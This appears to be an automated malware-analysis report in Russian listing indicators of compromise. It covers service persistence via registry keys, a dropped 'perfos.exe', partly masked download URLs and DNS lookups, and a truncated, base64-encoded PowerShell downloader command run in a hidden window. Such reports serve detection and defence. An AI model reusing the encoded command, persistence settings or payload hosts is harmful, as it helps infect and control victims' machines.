Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\perfos] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\perfos] 'ImagePath' = '"%WINDIR%\SysWOW64\dsauth\perfos.exe"'
- 'perfos' "%WINDIR%\SysWOW64\dsauth\perfos.exe"
- 'perfos' %WINDIR%\SysWOW64\dsauth\perfos.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFAHgAcwB4AGEAMgA5AD0AKAAoACcAUwBrAF8AbwAnACsAJwBfADMAJwApACsAJwByACcAKQA7ACYAKAAnAG4AZQB3AC0AJwArACcAaQB0AGUAJwArACcAbQAnACkAIAAkAEUATgBWADoAdABFAE0AcABcAFcAbwByAGQAXAAyADAAMQA5AFwAIAAtAG...
- %TEMP%\word\2019\ww1uczsw.exe
- %WINDIR%\syswow64\dsauth\perfos.exe
- %TEMP%\word\2019\ww1uczsw.exe в %WINDIR%\syswow64\dsauth\perfos.exe
- '17#.#1.208.86':80
- http://ri####ewelder.com/dtbkup20110205/i/
- http://tf###ru.com.br/cgi-bin/Lhe/
- http://17#.#1.208.86/LNMSeGI8/B0GBbGz7Zpy/FrWfn9KH/
- DNS ASK ri####ewelder.com
- DNS ASK si###gps.com
- DNS ASK tf###ru.com.br
- '%TEMP%\word\2019\ww1uczsw.exe'
- '%WINDIR%\syswow64\dsauth\perfos.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFAHgAcwB4AGEAMgA5AD0AKAAoACcAUwBrAF8AbwAnACsAJwBfADMAJwApACsAJwByACcAKQA7ACYAKAAnAG4AZQB3AC0AJwArACcAaQB0AGUAJwArACcAbQAnACkAIAAkAEUATgBWADoAdABFAE0AcABcAFcAbwByAGQAXAAyADAAMQA5AFwAIAAtAG...' (со скрытым окном)